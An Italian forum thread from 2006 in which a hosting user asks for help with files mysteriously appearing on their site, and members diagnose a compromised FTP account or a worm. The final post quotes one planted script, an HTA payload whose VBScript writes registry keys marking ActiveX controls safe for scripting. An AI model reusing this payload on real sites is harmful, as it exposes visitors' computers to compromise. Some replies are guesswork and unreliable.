Visualizzazione risultati 1 fino 21 di 21

Discussione: Creazione file sconosciuti (Aiuto!!!!!)

  1. #1
    Guest

    Question Creazione file sconosciuti (Aiuto!!!!!)

    Uff

    è da un pò di tempo che nel mio sito si creano file da soli!!!
    allora pagina inziale originale si è trasformata in _index.php
    mentre prima era solo index.php

    Come devo Fare?HuhHuhHuh!?!?!?!
    anche se li cancello dopo un pò di tempo ricompaiono!!!
    cosa devo fareee!!!

    i file che si creano da soli sono crechiati in rosso!!!



    Questi sono i file vedeteli
    http://www.amoga.altervista.org/a.asp
    http://www.amoga.altervista.org/a.php
    http://www.amoga.altervista.org/a.pl
    http://www.amoga.altervista.org/a.asp
    http://www.amoga.altervista.org/help.zip
    http://www.amoga.altervista.org/index.php (Mi ha cambiato la pagina orginale)
    infatti me la trasforma in _index.php

    COSA DEVO FAREEE?

    FunCool: Usa titoli che spiegano il problema.
    Ultima modifica di funcool : 26-03-2006 alle ore 17.43.25

  2. #2
    L'avatar di mythologia
    mythologia non è connesso Moderatore
    Data registrazione
    05-01-2004
    Messaggi
    2,614

  3. #3
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    Non sono files che si creano da soli ma risulta evidente anche dai log di accesso che si tratti di una seconda persona che si connette e carica tali files.

    Accertati di non aver dato anche involontariamente la tua password di accesso a nessuno, che la tua mailbox non sia letta da nessuno, di non avere scripts php (forum, CMS o altro) vulnerabili, ovviamente cambia la tua password di accesso in qualcosa di non intuibile.
    Gianluca

  4. #4
    Guest

    Predefinito

    Beh già ho cambiato la pass!!!
    ma è la stessa cosa!!!
    è poi sono sempre gli stessi file
    secondo me è qualche script!!

  5. #5
    Guest

  6. #6
    L'avatar di chrisbiro
    chrisbiro non è connesso Utente storico
    Data registrazione
    23-03-2004
    Residenza
    Sud-Est Asiatico
    Messaggi
    4,363

    Predefinito

    Ciao, @Amoga non fare doppi posta ma usa il tasto edita!!

    Ciao

  7. #7
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    e poi in tutti i miei siti escono
    Questo conferma ulteriormente la tesi esposta, che sia poi una persona fisica o uno script che si connette al tuo ftp e carica quei files poco importa.
    Gianluca

  8. #8
    Guest

    Predefinito

    Come faccio per levare questo script????

  9. #9
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    18,035

    Predefinito

    Non è uno script nel tuo spazio ma può essere qualcuno che usa un software per automatizzare tali operazioni.

    Ti ho scritto nel post precedente quanto puoi fare per porre rimedio al problema.
    Gianluca

  10. #10
    Guest

    Post Basta controllare i log

    Potrebbe essere uno script,che apre una bella sessione ftp e fà un upload dei file,che a mio modesto parere sono malevoli.

    Le possibilità che sia uno script sono del 95 %.

    Ti spiego pure il perchè.

    Su altervista come ben sappiamo i file .asp,non possono essere eseguiti perchè av usa il php,quindi per chiarire bene le cose lo script si comporta in questa maniera.

    Entra dalla porta 21 (non nè sono sicuro cmq da qualche parte entra)

    Apre una sessione collegandosi al server (può darsi ke sia anke una shell)

    Copia gli eventuali files (che sicuramente stanno su un server che fà da relay)

    Siccome è uno script copia tutti i file con le estensioni possibili in modo che se su un server non và il php usa l'asp ecc...

    Rinomina un'eventuale index.php (NON LO SOSTITUISCE)

    Mi è sembrato di vedere nel codice della pagine una specie di exploit che esegue un codice arbitrario,portandoti su un file hta.

    Ecco dovè il vero problema il file .hta.

    Non sò se questo file è un virus (nn credo).

    Credo solo che funga da realay.

    Cioè mi usa per infettare un'altro server,e possibilmente mi sniffa e prende le mie password di accesso ai server ftp (quindi è inutile che io cambi password).

    Le possibilità che questo sia uno script molto ridicolo ci sono.
    Ma attenzione che sono proprio le cose ridicole che fanno danno.

    Caro amico t'invito a controllare dal registro di sistema i file che vengono avviati in automatico all'avvio.
    Oppure prova col msconfig.

    Una piccola deduzione.
    Io penso che tu sei andato a fare un giro su astalavista e ti sei beccato un bel worm :D .
    Ciaoo stammi bene
    Ultima modifica di svacant : 25-03-2006 alle ore 21.38.47

  11. #11
    Guest

    Predefinito

    io sosterrei anche la tesi della persona fisica, ci sono molti programmi come c**** e a *****che attaccano il sistema e lo costringono a sputare la password
    non sono sicuro del worm

  12. #12
    Guest

    Predefinito

    Ho capito che lo script o l'eventuale worm
    sfrutta l'index cioè la pagina iniziale
    ma se si cambia nome il problema si risolve
    infatti ho un sito dove non c'è index (Pagin Iniziale) e infatti non c'è nessun problema :)

    Beh volevo chiedere se apposto di index
    per mettere una pagina inziale ci sia qualche altro modo!!?!??!?!


    PS: come faccio a controllare il registro di sistema e il msconfing ??

  13. #13
    Guest

    Talking Ti spiego tutto

    Start>esegui>msconfig

    Si aprirà una finestrella.

    Vai nella scheda Avvio.

    Lì ci saranno tutti gli elementi che si avviano al caricamento di windows.

    Se non vuoi che si avviino deselezionali.

    __________________________________________________ _________

    Start>esegui>regedit

    HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run

    Una volta selezionata la cartellina Run appariranno accanto valori,questi valori servono ad avviare un programma specifico all'avvio di windows,solitamente prendono il nome del file exe.

    __________________________________________________ _____________

    Comunque così dovresti rimuovere l'eventuale programmino (chiamiamolo così per intenderci) che ti usa per entrare sul tuo server FTP.

    Comunque io credo che la persona fisica che fà questo sei tu o meglio lo fà il tuo pc :D .

    Stammi bene.

  14. #14
    Guest

    Predefinito

    in effetti è vero specialmente se usi il dreamwever
    anch'io certe volte trovo documenti nuovi ma li crea il programma stesso
    ma mi sembra strano che li registri direttamente nel ftp

  15. #15
    L'avatar di silverseraph
    silverseraph non è connesso AlterGuru
    Data registrazione
    27-04-2005
    Residenza
    Localhost
    Messaggi
    1,104

    Predefinito

    Hai provato a visualizzare il contenuto di quei files?

  16. #16
    Guest

    Predefinito

    Si dentro ci sono degli script!!

  17. #17
    L'avatar di funcool
    funcool non è connesso Utente storico
    Data registrazione
    05-02-2004
    Residenza
    Qui... Non lì, qui!
    Messaggi
    15,433

    Predefinito

    Scusami, ma vedo che hai fatto uno scan sul tuo computer. Non è magari il programma che usi per fare i tuoi siti che crea quei file? O forse non ho capito niente io...
    Mattia vi manda a FunCool - Matriz - Directory Gogol - Sfondo rosso per la Birmania
    «Tu mi dai fastidio perché ti credi tanto un Dio!» «Bè, dovrò pur prendere un modello a cui ispirarmi, no?» Woody Allen

  18. #18
    L'avatar di seneca
    seneca non è connesso Super Moderatore
    Data registrazione
    18-12-2004
    Residenza
    la Città Eterna
    Messaggi
    8,376

    Predefinito

    vorrei fare una precisazione e dare un consiglio:
    1) uso dreamveawer (non per l'FTP ma per creare e gestire pagine) e non mi è stata mai creato nulla che non volessi
    2) con msconfig già puoi anche giocarci, in quanto devi solo selezionare/deselezionare processi di cui si può facilmente intuire la provenienza/utilità ma ti sconsiglio vivamente di toccare il registro di sistema, a meno che tu non ne abbia una buona conoscenza: alle brutte, se modifiche qualcosa che non avresti dovuto, puoi anche rischiare che non ti parta più il sistema!


    -- Aut Roma Aut Nihil!

  19. #19
    Guest

    Predefinito

    Beh lo so !!!
    c'è l'ho le conoscenze non ti preoccupare!

  20. #20
    L'avatar di silverseraph
    silverseraph non è connesso AlterGuru
    Data registrazione
    27-04-2005
    Residenza
    Localhost
    Messaggi
    1,104

    Predefinito

    Puoi linkare uno script di quelli?

  21. #21
    Guest

    Predefinito

    Ecco uno dei tanti

    print "Content-Type: application/hta;\r\n\r\n";print "<script language=vbs>self.MoveTo 0, 0
    Set r=CreateObject(\"WScript.Shell\")
    r.RegWrite \"HKCR\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}\\\",\"\",\"REG_SZ\"
    r.RegWrite \"HKCR\\CLSID\\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4}\\\",\"\",\"REG_SZ\"
    self.Close
    </script>";

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •